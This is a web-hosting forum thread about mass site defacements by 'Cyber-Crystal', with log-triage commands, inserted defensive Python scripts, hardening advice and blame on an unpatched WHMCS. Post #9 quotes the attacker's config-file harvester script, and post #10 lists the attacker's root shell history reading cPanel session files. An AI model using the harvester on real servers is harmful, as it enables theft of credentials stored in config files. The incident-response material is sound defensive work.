  1. #1

    Hacked by Cyber-Crystal

    A number of websites on my shared hosting have been hacked and replaced with one page, and files were added: index.htm, index.php, index.html.
    The page says "Hacked by CYBER-CRYSTALL".
    I googled and noticed thousands of sites are currently being attacked this way.
    My question is: what security can I put in place to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?

  2. #2
    Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

  3. #3
    Indeed, you should check the server logs. Also update the script you are using (wordpress etc) to the latest version.

  4. #4
    Check server access logs for successful logins:

    last
    cat /var/log/secure* | grep ssh | grep Accept
    cat /var/log/secure* |grep ftp |grep Accept
    less /var/log/messages | grep ftp

    Once done check for hidden dirs:

    updatedb
    locate "..."
    locate ".. "
    locate " .."
    locate ". "
    locate " ."

    Assuming you find nothing suspicious here, start checking access logs and such for suspicious items; ensure you check for rootkits also.

    I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.

    Failing this, check the server for possible exploits / out-of-date software.

    Good luck with your search I hope you keep us up to date.
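Added example, not from any post in the thread: a Python version of the two triage passes in the post above, pulling successful SSH and FTP logins out of /var/log/secure-style lines and walking the filesystem for the dot-and-space directory names that the locate patterns look for. The log lines, hostname, accounts and IPs are constructed for the demo; the two FTP line formats are approximations of pure-ftpd and vsftpd syslog output and may not match your daemon's exact wording, so adjust the regexes to your logs.

```python
#!/usr/bin/env python3
"""Post-compromise triage helpers (added example, not from the thread):
successful-login extraction from /var/log/secure-style lines and a walk for
the odd hidden directory names (`...`, `. `, ` ..`) that locate is used for."""
import os
import re
import tempfile
from collections import defaultdict

# Constructed sample in the syslog style of /var/log/secure on CentOS, plus
# two FTP daemon lines in roughly the style of pure-ftpd and vsftpd. Not real.
SAMPLE_SECURE_LOG = """\
Dec  8 03:12:45 web1 sshd[21044]: Accepted password for root from 203.0.113.45 port 51234 ssh2
Dec  8 03:12:50 web1 sshd[21044]: pam_unix(sshd:session): session opened for user root by (uid=0)
Dec  8 03:15:01 web1 sshd[21110]: Failed password for invalid user admin from 198.51.100.7 port 40022 ssh2
Dec  8 03:20:07 web1 pure-ftpd: (?@203.0.113.45) [INFO] site1 is now logged in
Dec  8 09:02:13 web1 sshd[21400]: Accepted publickey for deploy from 192.0.2.10 port 50011 ssh2
Dec  8 11:41:02 web1 vsftpd[21250]: [site2] OK LOGIN: Client "192.0.2.10"
"""

SSH_ACCEPT = re.compile(r'sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port \d+')
PURE_FTP = re.compile(r'pure-ftpd: \(\S*?@(?P<ip>[\d.]+)\) \[INFO\] (?P<user>\S+) is now logged in')
VSFTPD = re.compile(r'vsftpd\[\d+\]: \[(?P<user>[^\]]+)\] OK LOGIN: Client "(?P<ip>[\d.]+)"')


def parse_logins(text):
    """Return one dict per *successful* login: service, user, ip, method."""
    logins = []
    for line in text.splitlines():
        m = SSH_ACCEPT.search(line)
        if m:
            logins.append({"service": "ssh", "user": m["user"], "ip": m["ip"], "method": m["method"]})
            continue
        m = PURE_FTP.search(line) or VSFTPD.search(line)
        if m:
            logins.append({"service": "ftp", "user": m["user"], "ip": m["ip"], "method": "password"})
    return logins


def flag_logins(logins, trusted_ips=frozenset()):
    """Things worth a second look: root over SSH, password auth, logins from
    IPs you do not recognise, and one IP touching several accounts (what a
    dumped FTP-client password store looks like from the server side)."""
    findings = []
    by_ip = defaultdict(set)
    for entry in logins:
        by_ip[entry["ip"]].add((entry["service"], entry["user"]))
        if entry["service"] == "ssh" and entry["user"] == "root":
            findings.append(f"root SSH login from {entry['ip']}")
        if entry["service"] == "ssh" and entry["method"] == "password":
            findings.append(f"password-auth SSH login for {entry['user']} from {entry['ip']}")
        if entry["ip"] not in trusted_ips:
            findings.append(f"{entry['service']} login for {entry['user']} from untrusted {entry['ip']}")
    for ip, accounts in by_ip.items():
        if len(accounts) > 1:
            findings.append(f"{ip} used {len(accounts)} different accounts: {sorted(accounts)}")
    return findings


ODD_NAME = re.compile(r"^[. ]+$")


def suspicious_name(name):
    """True for names made only of dots and spaces ('...', '. ', ' ..') or
    padded with whitespace: the classic stash directory that `ls` hides."""
    if name in (".", ".."):
        return False
    return bool(ODD_NAME.match(name)) or name != name.strip()


def find_hidden_dirs(root):
    """Walk root and return full paths of directories with suspicious names."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        hits.extend(os.path.join(dirpath, d) for d in dirnames if suspicious_name(d))
    return sorted(hits)


def demo_hidden_dirs():
    """Build a throwaway tree with two stash directories and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "home", "site1", "public_html", "..."))
        os.makedirs(os.path.join(tmp, "home", "site2", "public_html", "images"))
        os.makedirs(os.path.join(tmp, "tmp", ". "))
        return [os.path.relpath(p, tmp) for p in find_hidden_dirs(tmp)]


if __name__ == "__main__":
    for finding in flag_logins(parse_logins(SAMPLE_SECURE_LOG), trusted_ips={"192.0.2.10"}):
        print("[login]", finding)
    for path in demo_hidden_dirs():
        print("[hidden dir]", path)
```

On a live box you would feed `parse_logins` the concatenation of `/var/log/secure*` (and the FTP daemon's own log if it does not go to syslog) and point `find_hidden_dirs` at `/`; the `locate` approach in the post depends on `updatedb` having run, which a walker does not.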

  5. #5
    Check scripts on your sites that allow uploading malicious files.

    I think this hacker can't do anything except add his index files, not SQL injection or others.

    So I recommend securing your server with the CSF firewall and mod_security.

  6. #6
    My first port of call would be to look at the FTP logs if a lot of people have been done the same way.

    My second look would be at any kind of 3rd-party scripts that a lot of other people may use (WordPress, mailer scripts, monitoring scripts, etc.).

    It's evidently a generic hack that a lot of people are vulnerable to.

  7. #7
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!

  8. #8
    Quote Originally Posted by Dig1 View Post
    A number of websites on my shared hosting have been hacked and replaced with one page, and files were added: index.htm, index.php, index.html.
    The page says "Hacked by CYBER-CRYSTALL".
    I googled and noticed thousands of sites are currently being attacked this way.
    My question is: what security can I put in place to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?
    Holy cow. A google search renders hundreds of hacked sites. Looks like someone needs to get a life.

  9. #9
    Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?

    #!/usr/bin/python
    # mekad By Cyber-Crystal
    #
    # Cyb3r.Crystal@Gmail.com

    # tryag.cc

    # Python 2 script. It takes the URL of a page that lists links to config
    # files, then downloads each linked file and saves it locally under the
    # same name: a config-file harvester, not a site fetcher.
    import urllib2, re

    raw = raw_input('URL CONF : ')
    url = urllib2.urlopen(raw)
    data = url.read()
    # Every href target on the listing page becomes a file to grab.
    finddata = re.findall('href="(.*?)">', data)
    for cyb3r in range(len(finddata)):
        try:
            # Local file named after the link, opened for append.
            filecon = open(finddata[cyb3r], 'a')
            # Fetch the linked file from the same server and write it out.
            done = urllib2.urlopen(raw + finddata[cyb3r])
            wewe = done.read()
            print "Witteng ....\n"
            filecon.write(wewe)
            print "Done "
        except IOError:
            print "error"

  10. #10

    UPDATE

    Yes, and in /etc/httpd/conf they also added 5 files named 1.pl, 2.pl, 3.pl etc.
    So I figured they had to have accessed root somehow and did this and added the files.
    In root's bash history:
    ls -l /etc/valiases
    cd /etc/valiases
    ls -la /etc/valiases
    ls -la /etc/valiases/
    cd /usr/loca/apache
    cd /etc/httpd/conf
    cat httpd.conf | grep DocumentRoot
    nano 1.pl
    pico 1.pl
    nano 1.pl
    yum install nano
    nano 1.pl
    perl 1.pl
    nano 2.pl
    perl 2.pl
    nano 3.pl
    perl 3.pl
    ifconfig
    nano 4.pl
    perl 4.pl
    exit
    pdw
    pwd
    ls
    locate index.html
    cd /var/www
    ls
    cd html
    ls
    cd ..
    cd /usr/local/apache
    cd /usr/local
    ls
    cd /etc/httpds
    cd /etc/httpd
    ls
    cd conf
    cat httpd.conf | grep DocumentRoot
    cat /var/cpanel
    cat * /var/cpanel/sessions
    dec6find /home*/*/public_html -type l
    ........
    So instead of looking for any more compromised files I reinstalled the OS and added server security hardening like:
    rkhunter, DenyHosts, fail2ban, mod_security, AIDE (Advanced Intrusion Detection Environment), and locked down the httpd config (file indexing) and / access. Also made root nologin except by su through a special user with a password of 16 characters, numbers and punctuation, and tightened PHP and MySQL security.
    I reloaded all customers' websites from backup and all is well for now.
    My iptables have grown quite a bit.
    A few country bans were added, and DenyHosts has added to the deny hosts file also.
    I am a little more confident now!
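Added example (mine, not the poster's or any tool's code): the file-integrity baseline that AIDE provides, cut down to a few functions, together with a scan for the index.htm/index.html/index.php triple the thread describes and for symlinks in the docroots, which the history above shows the attacker enumerating with find -type l. The two-site tree, the page contents and the "Hacked by" marker are constructed in a temp directory so it runs offline; on a real box you build the baseline from a known-good state, keep it off the server, and re-run compare() against the live tree.

```python
#!/usr/bin/env python3
"""Minimal AIDE-style baseline plus a defacement scan for web docroots
(added example; the tree it scans is built in a temp directory)."""
import hashlib
import os
import re
import tempfile

# The index files this campaign dropped, and the banner they carried.
INDEX_NAMES = {"index.htm", "index.html", "index.php"}
DEFACE_MARKER = re.compile(rb"hacked\s+by", re.IGNORECASE)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> (sha256, mode, size) for every regular file under root.
    Symlinks are skipped here and reported separately by scan_docroots."""
    base = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            st = os.stat(p)
            base[os.path.relpath(p, root)] = (sha256_file(p), oct(st.st_mode & 0o777), st.st_size)
    return base


def compare(baseline, current):
    """AIDE-style diff of two baselines: added, removed and changed paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def scan_docroots(root):
    """Return (defaced index files, symlinks) under root. Only the first
    1 MiB of each index file is read, which is plenty for a banner page."""
    hits, links = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames + dirnames:
            p = os.path.join(dirpath, name)
            if os.path.islink(p):
                links.append(os.path.relpath(p, root))
        for name in filenames:
            if name.lower() in INDEX_NAMES:
                p = os.path.join(dirpath, name)
                with open(p, "rb") as f:
                    if DEFACE_MARKER.search(f.read(1 << 20)):
                        hits.append(os.path.relpath(p, root))
    return sorted(hits), sorted(links)


def _write(path, data):
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Two clean sites, a baseline, then the defacement; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        site1 = os.path.join(tmp, "site1", "public_html")
        site2 = os.path.join(tmp, "site2", "public_html")
        os.makedirs(site1)
        os.makedirs(site2)
        _write(os.path.join(site1, "index.php"), b"<?php echo 'welcome'; ?>")
        _write(os.path.join(site2, "index.html"), b"<html>hello</html>")
        baseline = build_baseline(tmp)

        # Simulated attacker activity: the index triple dropped into site1 and
        # a symlink planted in site2 (the kind of thing `find -type l` lists).
        for name in INDEX_NAMES:
            _write(os.path.join(site1, name), b"<html><body>Hacked by CYBER-CRYSTALL</body></html>")
        os.symlink("/etc/passwd", os.path.join(site2, "passwd"))

        diff = compare(baseline, build_baseline(tmp))
        hits, links = scan_docroots(tmp)
        return diff, hits, links


if __name__ == "__main__":
    diff, hits, links = demo()
    print("integrity diff:", diff)
    print("defaced index files:", hits)
    print("symlinks in docroots:", links)
```

The diff catches the two new index files and the rewritten index.php even without the banner check, which is the point of keeping a baseline: a second campaign with a different marker string still shows up as an unexpected change.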

  11. #11
    Quote Originally Posted by Dig1 View Post
    So instead of looking for any more compromised files I reinstalled the OS and added server security hardening
    Probably the best thing.

    - You have identified whats going on and what level of compromise you have had.
    - You have taken the best action possible and re-installed now knowing what to look out for.

    If only everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running.

  12. #12
    ty yup yup

  13. #13
    Quote Originally Posted by Dig1 View Post
    A number of websites on my shared hosting have been hacked and replaced with one page, and files were added: index.htm, index.php, index.html.
    The page says "Hacked by CYBER-CRYSTALL".
    I googled and noticed thousands of sites are currently being attacked this way.
    My question is: what security can I put in place to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?
    If only a number of sites have been hacked, it could be due to insecure versions of software. If it was all of the sites, I'm sorry to say, but you have been rooted.

    - Ashton

  14. #14
    If he can switch directories and read files, your server is not set up properly, and just installing the server software you mentioned may not even be enough; it all has to be configured correctly to be effective.

    And btw - this certainly looks like a real SKID

  15. #15
    Quote Originally Posted by ioTerrence View Post
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!
    I liked that song.

  16. #16

    Affordable Multimedia

    Quote Originally Posted by ioTerrence View Post
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!
    Hi -- I tried to contact you directly, but it won't let me! Anyway, I had FOUR sites hacked by this butthead, and all were hosted with afmu.com. I have been trying to get in touch with someone, anyone at this company every day over the past week and no one seems to care. I'm just curious if you contacted the company and anyone got back to you on this issue.

    Thanks!

  17. #17
    Quote Originally Posted by FireHippie View Post
    Hi -- I tried to contact you directly, but it won't let me! Anyway, I had FOUR sites hacked by this butthead, and all were hosted with afmu.com. I have been trying to get in touch with someone, anyone at this company every day over the past week and no one seems to care. I'm just curious if you contacted the company and anyone got back to you on this issue.

    Thanks!
    Hey FireHippie, unfortunately I still have an open ticket with them. I'm trying not to be a demon customer and give AFMU.com the benefit of the doubt- it's the holiday season, and it looks like they may have been hit disproportionately hard by the script-kiddie. That being said, I do find myself browsing other service providers' offerings...

  18. #18
    If the host was compromised I wouldn't be sticking around either. There's so much that can be done to keep access to a host if the hacker was that savvy; the guy mentioned in this thread was just a little skid, it sounds like.

  19. #19
    I too have multiple sites hosted with AFMU.com. This hacker has taken down 3 Wordpress sites and I'm going to take my business elsewhere asap! I'll move my sites and deal with cutting off my automatic payment somehow.

    It's a shame because I've been with AFMU for 7 years now and they've always been very responsive. However an email I just sent them bounced back and there's no way to open a support ticket.

    I feel bad for AFMU too, but I must say their uptime has been shaky at best lately. They crashed back in September for several days also. I don't know what's going on with them, but it irks me that there is NO phone number to get a hold of anyone.

    My question is, how can I get to my MySQL databases that house the Wordpress posts? I must confess I don't know where they are stored in the hierarchy. Can anyone shed some light here? I am able to log in via FTP.

  20. #20
    Quote Originally Posted by PixelGirl View Post
    My question is, how can I get to my MySQL databases that house the Wordpress posts? I must confess I don't know where they are stored in the hierarchy. Can anyone shed some light here? I am able to log in via FTP.
    If you can access FTP, you may be able to access your control panel via yourdomain.com/cpanel or cpanel.yourdomain.

    I would take a full site backup if possible and then give that file to your new host to restore, provided they use cPanel too. That will preserve all of your data, including email accounts and emails stored on the server, databases, etc. Once restored to another cPanel host you should be back up and running without any loss of data.

    We've had a customer come from AFMU a couple days ago, and we managed to transfer his site this way. I'd be happy to do likewise for you or anyone else affected.

    WHMCS released a security patch on December 1 to protect against this exploit. From the sounds of it, AFMU did not apply the patch in time. It was an easy, single file patch that we applied within minutes of receiving the security alert from WHMCS.

    Once WHMCS is exploited, root access to all servers is available to the hacker, which would explain why so many AFMU sites had subsequent problems.

  21. #21
    If you have a fixed IP, your websites seem more likely to be hacked.
